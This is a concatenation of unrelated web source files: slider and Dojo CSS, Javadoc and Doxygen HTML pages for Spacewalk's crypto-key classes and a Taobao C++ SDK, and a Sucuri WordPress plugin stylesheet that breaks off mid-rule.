.flex-control-paging li a {width: 11px; height: 11px; display: block; background: #666; background: rgba(0,0,0,0.5); cursor: pointer; text-indent: -9999px; -webkit-border-radius: 20px; -moz-border-radius: 20px; -o-border-radius: 20px; border-radius: 20px; -webkit-box-shadow: inset 0 0 3px rgba(0,0,0,0.3); -moz-box-shadow: inset 0 0 3px rgba(0,0,0,0.3); -o-box-shadow: inset 0 0 3px rgba(0,0,0,0.3); box-shadow: inset 0 0 3px rgba(0,0,0,0.3); }
.flex-control-paging li a:hover { background: #333; background: rgba(0,0,0,0.7); }
.flex-control-paging li a.flex-active { background: #000; background: rgba(0,0,0,0.9); cursor: default; }
.flex-control-thumbs {margin: 5px 0 0; position: static; overflow: hidden;}
.flex-control-thumbs li {width: 25%; float: left; margin: 0;}
.flex-control-thumbs img {width: 100%; display: block; opacity: .7; cursor: pointer;}
.flex-control-thumbs img:hover {opacity: 1;}
.flex-control-thumbs .flex-active {opacity: 1; cursor: default;}
@media screen and (max-width: 860px) {
.flex-direction-nav .flex-prev { opacity: 1; left: 10px;}
.flex-direction-nav .flex-next { opacity: 1; right: 10px;}
} |
documentation/javadoc/com/redhat/rhn/frontend/action/keys/package-summary.html | colloquium/spacewalk | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_18) on Tue Nov 02 13:16:53 CET 2010 -->
<TITLE>
com.redhat.rhn.frontend.action.keys
</TITLE>
<META NAME="date" CONTENT="2010-11-02">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="com.redhat.rhn.frontend.action.keys";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Package</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../com/redhat/rhn/frontend/action/help/package-summary.html"><B>PREV PACKAGE</B></A>
<A HREF="../../../../../../com/redhat/rhn/frontend/action/keys/test/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html?com/redhat/rhn/frontend/action/keys/package-summary.html" target="_top"><B>FRAMES</B></A>
<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<H2>
Package com.redhat.rhn.frontend.action.keys
</H2>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Class Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/action/keys/BaseCryptoKeyEditAction.html" title="class in com.redhat.rhn.frontend.action.keys">BaseCryptoKeyEditAction</A></B></TD>
<TD>BaseCryptoKeyEditAction - abstract base class for cryptokeys</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/action/keys/CryptoKeyCreateAction.html" title="class in com.redhat.rhn.frontend.action.keys">CryptoKeyCreateAction</A></B></TD>
<TD>CryptoKeyCreateAction</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/action/keys/CryptoKeyDeleteAction.html" title="class in com.redhat.rhn.frontend.action.keys">CryptoKeyDeleteAction</A></B></TD>
<TD>CryptoKeyDeleteAction</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/action/keys/CryptoKeyEditAction.html" title="class in com.redhat.rhn.frontend.action.keys">CryptoKeyEditAction</A></B></TD>
<TD>CryptoKeyCreateAction</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/action/keys/CryptoKeysListSetupAction.html" title="class in com.redhat.rhn.frontend.action.keys">CryptoKeysListSetupAction</A></B></TD>
<TD>CryptoKeysListSetupAction : class to list set of crypto keys</TD>
</TR>
</TABLE>
<P>
<DL>
</DL>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Package</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../com/redhat/rhn/frontend/action/help/package-summary.html"><B>PREV PACKAGE</B></A>
<A HREF="../../../../../../com/redhat/rhn/frontend/action/keys/test/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html?com/redhat/rhn/frontend/action/keys/package-summary.html" target="_top"><B>FRAMES</B></A>
<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
com.springsource.hq.plugin.tcserver.serverconfig.web/src/main/webapp/dijit/themes/claro/form/Select_rtl.css | pivotal/tcs-hq-management-plugin | /*
* Copyright (C) 2009-2015 Pivotal Software, Inc
*
* This program is is free software; you can redistribute it and/or modify
* it under the terms version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
.claro .dijitSelectRtl .dijitButtonContents {
border-right-width: 0px;
border-left-width: 1px;
}
|
doc/TaobaokeShop_8cpp.html | sd44/TaobaoCppQtSDK | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.3.1"/>
<title>Taobao Cpp/Qt SDK: TaoApiCpp/domain/TaobaokeShop.cpp File Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">Taobao Cpp/Qt SDK
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.3.1 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="annotated.html"><span>Classes</span></a></li>
<li class="current"><a href="files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="files.html"><span>File List</span></a></li>
<li><a href="globals.html"><span>File Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Pages</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="dir_5ced2c06884fa9bf5c2da90298abd959.html">TaoApiCpp</a></li><li class="navelem"><a class="el" href="dir_1d1cbaedbe3d143e418592406317d711.html">domain</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">TaobaokeShop.cpp File Reference</div> </div>
</div><!--header-->
<div class="contents">
<div class="textblock"><code>#include <<a class="el" href="TaobaokeShop_8h_source.html">TaoApiCpp/domain/TaobaokeShop.h</a>></code><br/>
</div></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Sun Apr 14 2013 16:25:37 for Taobao Cpp/Qt SDK by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.3.1
</small></address>
</body>
</html>
|
wp-content/plugins/sucuri-scanner/inc/css/sucuriscan-default-css.css | slamorte/dk | /**
* Sucuri Security - SiteCheck Malware Scanner
* Copyright (C) 2010-2015 Sucuri Security - http://sucuri.net
* Released under the GPL - see LICENSE file for details.
*/
/* Generic Styles */
.sucuriscan-wrap *, .sucuriscan-wrap *:before, .sucuriscan-wrap *:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}
.sucuriscan-clearfix:before, .sucuriscan-clearfix:after{display:table;content:' '}
.sucuriscan-clearfix:after{clear:both}
.sucuriscan-visible{}
.sucuriscan-hidden{display:none !important}
.sucuriscan-monospace{font-family:Monospace, Courier}
.sucuriscan-ellipsis{overflow:hidden;display:inline-block;white-space:nowrap;text-overflow:ellipsis}
.sucuriscan-wraptext{word-break:break-all}
.sucuriscan-pull-left{float:left}
.sucuriscan-pull-right{float:right}
.sucuriscan-list li{list-style:disc;margin:0 0 5px 15px}
.sucuriscan-gradient, .sucuriscan-modal-header, .sucuriscan-maincontent .sucuriscan-table tr > th{background:#f1f1f1;background-image:-webkit-gradient(linear,left bottom,left top,from(#ececec),to(#f9f9f9));background-image:-webkit-linear-gradient(bottom,#ececec,#f9f9f9);background-image:-moz-linear-gradient(bottom,#ececec,#f9f9f9);background-image:-o-linear-gradient(bottom,#ececec,#f9f9f9);background-image:linear-gradient(to top,#ececec,#f9f9f9)}
/* WordPress Extra Buttons (success) */
.wp-core-ui .button-success, .wp-core-ui .button-success.focus, .wp-core-ui .button-success.hover, .wp-core-ui .button-success:focus, .wp-core-ui .button-success:hover{background:#8dcd5a;border-color:#48a325;box-shadow:inset 0 1px 0 rgba(195, 230, 180, 0.6)}
.wp-core-ui .button-success.focus, .wp-core-ui .button-success.hover, .wp-core-ui .button-success:focus, .wp-core-ui .button-success:hover{background:#69be48}
.wp-core-ui .button-success.focus, .wp-core-ui .button-success:focus{border-color:#23500e}
.wp-core-ui .button-success.active, .wp-core-ui .button-success.active:focus, .wp-core-ui .button-success.active:hover, .wp-core-ui .button-success:active{background:#47a61b;border-color:#358400}
.wp-core-ui .button-success-disabled, .wp-core-ui .button-success.disabled, .wp-core-ui .button-success:disabled, .wp-core-ui .button-success[disabled]{color:#b2e794 !important;background:#74ba29 !important;border-color:#3f7f1b !important}
/* WordPress Extra Buttons (danger) */
.wp-core-ui .button-danger, .wp-core-ui .button-danger.focus, .wp-core-ui .button-danger.hover, .wp-core-ui .button-danger:focus, .wp-core-ui .button-danger:hover{background:#cd5050;border-color:#a52121;box-shadow:inset 0 1px 0 rgba(230, 170, 170, 0.6)}
.wp-core-ui .button-danger.focus, .wp-core-ui .button-danger.hover, .wp-core-ui .button-danger:focus, .wp-core-ui .button-danger:hover{background:#be4242}
.wp-core-ui .button-danger.focus, .wp-core-ui .button-danger:focus{border-color:#500e0e}
.wp-core-ui .button-danger.active, .wp-core-ui .button-danger.active:focus, .wp-core-ui .button-danger.active:hover, .wp-core-ui .button-danger:active{background:#a61b1b;border-color:#840000}
.wp-core-ui .button-danger-disabled, .wp-core-ui .button-danger.disabled, .wp-core-ui .button-danger:disabled, .wp-core-ui .button-danger[disabled]{color:#e79494 !important;background:#ba2929 !important;border-color:#7f1b1b !important}
/* Modal Window */
.sucuriscan-overlay{position:fixed;top:0;left:0;bottom:0;right:0;z-index:800;background:rgba(0, 0, 0, 0.5)}
.sucuriscan-modal{position:fixed;top:100px;left:50%;z-index:900}
.sucuriscan-modal-outside{position:relative;left:-50%;border:1px solid #ddd}
.sucuriscan-modal-inside{background:#fff;padding:20px}
.sucuriscan-modal-header{padding:10px 20px;border-bottom:1px solid #ddd}
.sucuriscan-modal-header .sucuriscan-modal-title{min-height:18px;margin:0}
.sucuriscan-modal-close{display:inline-block;position:absolute;top:0;right:0;font-size:16px;font-weight:bold;text-decoration:none;line-height:39px;padding:0 15px;border-left:1px solid #ddd}
.sucuriscan-modal-inside p:first-child{margin-top:0}
.sucuriscan-modal-inside p:last-child{margin-bottom:0}
/* Label and Tags */
.sucuriscan-label, .sucuriscan-label-default, .sucuriscan-label-unknown, .sucuriscan-label-primary, .sucuriscan-label-success, .sucuriscan-label-info, .sucuriscan-label-notice, .sucuriscan-label-warning, .sucuriscan-label-danger, .sucuriscan-label-error{display:inline;font-size:75%;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;padding:0.2em 0.6em 0.3em;border-radius:0.25em}
.sucuriscan-label-default, .sucuriscan-label-unknown{background:#777}
.sucuriscan-label-danger, .sucuriscan-label-error{background:#d9534f}
.sucuriscan-label-info, .sucuriscan-label-notice{background:#5bc0de}
.sucuriscan-label-warning{background:#f0ad4e}
.sucuriscan-label-success{background:#5cb85c}
.sucuriscan-label-primary{background:#428bca}
/* Interface Wrapper */
.sucuriscan-wrap{margin-top:20px}
.sucuriscan-wrap .sucuriscan-maincontent{margin:20px 0}
.sucuriscan-wrap .sucuriscan-leftside{width:73.5%;float:left}
.sucuriscan-wrap .sucuriscan-twocolumns{}
.sucuriscan-wrap .sucuriscan-onecolumn{width:100%}
.sucuriscan-wrap .sucuriscan-sidebar{width:25%;float:right}
.sucuriscan-wrap #warnings_hook{line-height:initial;padding:0}
.sucuriscan-wrap .sucuriscan-navbar{padding-top:20px;padding-left:6px}
.sucuriscan-wrap .sucuriscan-navbar .nav-tab{margin-right:0}
.sucuriscan-header, .sucuriscan-footer{position:relative;min-width:255px;background:#333;margin:0;padding:10px;border-radius:4px}
.sucuriscan-footer .sucuriscan-help{color:#fff;float:right;text-align:right}
.sucuriscan-footer .sucuriscan-help p{line-height:38px;margin:0 10px 0 0;padding:0}
.sucuriscan-wrap .sucuriscan-logo, .sucuriscan-wrap .sucuriscan-header h2, .sucuriscan-wrap .sucuriscan-footer h2{float:left;margin:0;padding:0}
.sucuriscan-wrap .sucuriscan-logo{display:inline-block}
.sucuriscan-wrap .sucuriscan-logo img{display:block}
.sucuriscan-wrap .sucuriscan-header h2, .sucuriscan-wrap .sucuriscan-footer h2{color:#fff;line-height:38px;margin-left:10px;text-shadow:#000 0 1px 0}
.sucuriscan-leftside #poststuff .postbox:last-child{margin-bottom:0}
.sucuriscan-maincontent abbr{text-decoration:underline;cursor:help}
/* Page Setup Notice */
.wrap div.sucuriscan-setup-notice{background:#bbe8f5;margin:0 0 20px 0;padding:0;border:1px solid #bbb;border-radius:3px;-webkit-box-shadow:none;box-shadow:none}
.wrap div.sucuriscan-setup-notice .sucuriscan-setup-image, .wrap div.sucuriscan-setup-notice .sucuriscan-setup-image img{border-radius:3px 0 0 3px}
.wrap div.sucuriscan-setup-notice .sucuriscan-setup-image{background:#333;margin:-1px 0 -1px -1px;padding:7px 10px;border-right:1px solid transparent}
.wrap div.sucuriscan-setup-notice .sucuriscan-setup-form{padding:4px;padding-left:0}
.wrap div.sucuriscan-setup-notice p{font-size:14px;line-height:20px;margin:0 0 0 10px;padding:7px 0}
.wrap div.sucuriscan-setup-notice, .wrap div.sucuriscan-setup-notice .sucuriscan-setup-image{border-color:#4393ac}
.wp-core-ui .sucuriscan-review-hero, .wp-core-ui .button.sucuriscan-review-hero{position:relative;top:-2px;right:-15px;height:initial;line-height:30px;float:right;padding:0 20px}
/* Table Styles */
.sucuriscan-maincontent .sucuriscan-table{margin-top:12px}
.sucuriscan-maincontent .sucuriscan-table tr > th{border-top:1px solid #e5e5e5;border-bottom:1px solid #e5e5e5}
.sucuriscan-maincontent .sucuriscan-table tr:first-child th{border-top:0}
.sucuriscan-maincontent .sucuriscan-table td.check-column{padding:8px 10px}
.sucuriscan-table-double-title tr:first-child th{border-bottom:0}
.sucuriscan-table-triple-title tr:first-child th, .sucuriscan-table-triple-title tr:first-child + tr th{border-bottom:0}
.sucuriscan-table-quad-title tr:first-child th, .sucuriscan-table-quad-title tr:first-child + tr th, .sucuriscan-table-quad-title tr:first-child + tr + tr th{border-bottom:0}
.sucuriscan-table-description{border-left-width:1px !important;box-shadow:none}
.sucuriscan-table-description .inside{border-bottom:0 !important}
.sucuriscan-maincontent .sucuriscan-lastmodified td{font-family:Monospace, Courier, serif;font-weight:bold}
.widefat td.td-with-button{text-align:right;padding:3px 10px}
.widefat td.td-with-button button{min-width:90px}
.widefat td.td-with-button select{height:initial;line-height:initial;vertical-align:top;margin:0;padding:2px 0 3px 0}
.sucuriscan-list-as-table{background:#fff;border:1px solid #e5e5e5}
.sucuriscan-list-as-table li{line-height:30px;word-break:break-all;margin:0;padding:0 10px}
.sucuriscan-list-as-table li:nth-child(odd){background:#f5f5f5}
.sucuriscan-list-as-table-scrollable{height:300px;overflow:hidden;overflow-y:scroll}
/* Table Top-Right Buttons */
.sucuriscan-maincontent .thead-with-button{padding:5px 5px 5px 10px}
.sucuriscan-maincontent .thead-with-button > span{display:inline-block;line-height:28px}
.sucuriscan-maincontent .thead-with-button .input-text{line-height:26px}
.sucuriscan-maincontent .thead-with-button select{margin:0;padding:0}
.sucuriscan-maincontent .thead-topright-action{display:inline-block;float:right}
/* Sidebar Styles */
.sucuriscan-sidebar .sucuriscan-ad{margin-bottom:20px}
.sucuriscan-sidebar .sucuriscan-ad-content{padding:1.5em;padding-bottom:0.5em;border:1px solid #ccc;border-bottom:0;border-radius:3px 3px 0 0}
.sucuriscan-sidebar .sucuriscan-ad:nth-child(odd) .sucuriscan-ad-content{background-color:#bbe8f5;border-color:#4393ac}
.sucuriscan-sidebar .sucuriscan-ad:nth-child(even) .sucuriscan-ad-content{background-color:#ececec;border-color:#999}
.sucuriscan-sidebar .sucuriscan-ad-content h2{font-size:18px;line-height:normal;padding:0}
.sucuriscan-sidebar .sucuriscan-ad-content .sucuriscan-list li{margin-left:17px}
.sucuriscan-sidebar .sucuriscan-ad-footer{margin-bottom:0}
.sucuriscan-sidebar .sucuriscan-ad-footer .button{width:50%;height:initial;text-align:center;line-height:36px}
.sucuriscan-sidebar .sucuriscan-ad-footer .button:first-child{border-right:0}
.sucuriscan-sidebar .sucuriscan-ad-footer .button.sucuriscan-pull-left{border-radius:0 0 0 3px}
.sucuriscan-sidebar .sucuriscan-ad-footer .button.sucuriscan-pull-right{border-radius:0 0 3px 0}
.sucuriscan-scanner-video{width:100%;background:#fff;border:1px solid #ddd}
.sucuriscan-sidebar .sucuriscan-supportbtn{width:100%;height:initial;text-align:center;line-height:36px;margin-top:15px;padding:0}
/* WordPress Alerts */
div.sucuriscan-alert{position:relative;margin:0 0 20px 0}
div.sucuriscan-alert > a.close{position:absolute;top:10px;right:10px;font-size:18px;font-weight:bold;text-decoration:none}
.sucuriscan-inline-alert, .sucuriscan-inline-alert-updated, .sucuriscan-inline-alert-error, .sucuriscan-inline-alert-warning, .sucuriscan-inline-alert-info{background:#fff;box-shadow:0 1px 1px 0 rgba(0,0,0,.1);padding:0;border-left:4px solid #ddd}
.sucuriscan-inline-alert > p, .sucuriscan-inline-alert-updated > p, .sucuriscan-inline-alert-error > p, .sucuriscan-inline-alert-warning > p, .sucuriscan-inline-alert-info > p{margin:0;padding:8px 12px;border:1px solid #ddd;border-left:0}
.sucuriscan-inline-alert-updated + div, .sucuriscan-inline-alert-warning + div, .sucuriscan-inline-alert-error + div, .sucuriscan-inline-alert-info + div{margin-top:10px}
.sucuriscan-inline-alert-updated{border-left-color:#7ad03a}
.sucuriscan-inline-alert-warning{border-left-color:#ffba00}
.sucuriscan-inline-alert-error{border-left-color:#dd3d36}
.sucuriscan-inline-alert-info{border-left-color:#2ea2cc}
/* Tabulation Panels */
.sucuriscan-tabs{}
.sucuriscan-tabs > ul{margin:0}
.sucuriscan-tabs > ul li, .sucuriscan-tabs > ul li > a{display:inline-block}
.sucuriscan-tabs > ul li{margin-bottom:0}
.sucuriscan-tabs > ul li > a{background:#e5e5e5;font-size:13px;font-weight:bold;color:#333;line-height:38px;text-decoration:none;padding:0 10px}
.sucuriscan-tabs > ul li > a.sucuriscan-tab-active{background:#fff;border:1px solid #e1e1e1;border-bottom:0}
.sucuriscan-tabs > ul li.sucuriscan-red-tab a{background:#ff8a83;color:#fff}
.sucuriscan-tabs > ul li.sucuriscan-red-tab a.sucuriscan-tab-active{background:#dd3d36;border-color:#dd3d36}
.sucuriscan-maincontent .sucuriscan-tab-containers > div > table{margin-top:0}
.sucuriscan-maincontent .sucuriscan-tab-containers > div > #poststuff{margin-top:0}
/* Get API Form */
.sucuriscan-getapi-div{background:#fff;margin:0 0 20px 0;border:1px solid #e5e5e5;border-radius:3px}
.sucuriscan-getapi-div p{margin:0;padding:10px}
.sucuriscan-getapi-form{}
.sucuriscan-getapi-form button.button-primary{width:100%;height:initial;line-height:30px;margin:0 0 -1px 0;padding:0;border-radius:0 0 3px 3px}
/* Scanner Page */
.sucuriscan-malwarescan-message{margin-bottom:20px !important}
.sucuriscan-loading{background:#fff;text-align:center;padding:30px;padding-bottom:15px;border:1px solid #ddd;border-radius:4px}
.sucuriscan-loading p, .sucuriscan-loading h3{margin:0;padding:0}
.sucuriscan-loading .title{font-size:28px;margin-bottom:10px}
.sucuriscan-loading .description{font-size:16px}
.sucuriscan-sitelogo{width:190px;height:100px;background:url('http://sitecheck.sucuri.net/images/sucuri-sprite.png') no-repeat;margin:0 auto}
.sucuriscan-sitecheck-form{margin:20px 0 0 0}
.sucuriscan-sitecheck-form .button.button-hero{padding:0 46px}
.sucuriscan-loading .sucuriscan-sitecheck-disclaimer{text-align:justify;padding-top:20px;border-top:1px solid #ddd}
.sucuriscan-loading .sucuriscan-sitecheck-disclaimer p{font-size:10px}
/* Scanner Results */
.sucuriscan-maincontent .sucuriscan-border{border:0;border-left:4px solid #ddd}
.sucuriscan-maincontent .sucuriscan-border > h3, .sucuriscan-maincontent .sucuriscan-border > .inside{border-top:1px solid #e5e5e5;border-right:1px solid #e5e5e5}
.sucuriscan-maincontent .sucuriscan-border > h3{border-bottom:0}
.sucuriscan-maincontent .sucuriscan-border > .inside{margin-top:0 !important;border-bottom:1px solid #ddd}
.sucuriscan-maincontent .sucuriscan-border-good, .sucuriscan-maincontent .sucuriscan-border-success{border-left-color:#7ad03a}
.sucuriscan-maincontent .sucuriscan-border-bad, .sucuriscan-maincontent .sucuriscan-border-danger{border-left-color:#dd3d36}
.sucuriscan-maincontent .sucuriscan-border-info{border-left-color:#2ea2cc}
.sucuriscan-maincontent .sucuriscan-cleanup-btn{display:block;text-align:center;margin:20px 0 0 0}
.sucuriscan-scanner-results .sucuriscan-scanner-details tr:nth-child(even),
.sucuriscan-scanner-results .sucuriscan-scanner-links tr:nth-child(even){background:#f5f5f5}
.sucuriscan-scanner-results td.sucuriscan-border-bad{border-left-width:4px;border-left-style:solid}
.sucuriscan-scanner-results .sucuriscan-malware-link{text-align:right}
.sucuriscan-scanner-results .sucuriscan-malware-link a:hover{color:#fff}
/* Generic Panel Magin Styles */
.sucuriscan-maincontent .sucuriscan-corefiles,
